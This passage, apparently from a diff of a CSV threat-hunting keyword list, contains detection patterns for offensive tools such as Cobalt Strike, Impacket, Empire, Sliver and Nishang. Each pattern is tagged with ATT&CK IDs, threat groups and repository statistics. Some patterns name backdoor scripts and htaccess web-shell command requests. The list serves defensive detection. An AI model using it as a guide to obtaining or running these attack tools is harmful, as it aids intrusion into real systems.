- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*http_stager_uri_x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http1.x64.bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*http1.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*HTTPAES256Handler.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" "*httpattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 
- T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*httpattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httpattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*httpattack.py*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*httpattack.py*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" -"*httpattacks/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*HTTP-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*http-c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*httpattacks/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*HTTP-Backdoor.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*http-c2_test.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*HttpEvilClippyController*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*HTTP-Login.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*httpntlm.go*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httpntlm.old*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httppayload.bin*","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","352","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*HttpProxyScan_Log4J2.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*http-redwarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*http-redwarden*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*httprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*httprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*httprelayserver.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*httprelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*httprelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*http-request-smuggler-all.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*https://*/.htaccess?c=cmd*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*https://*/.htaccess?c=uname -a*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" -"*https://*/releases/download/*/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*https://*/releases/download/*/lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*https://*Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","1","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*https://0.0.0.0:1337*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD 
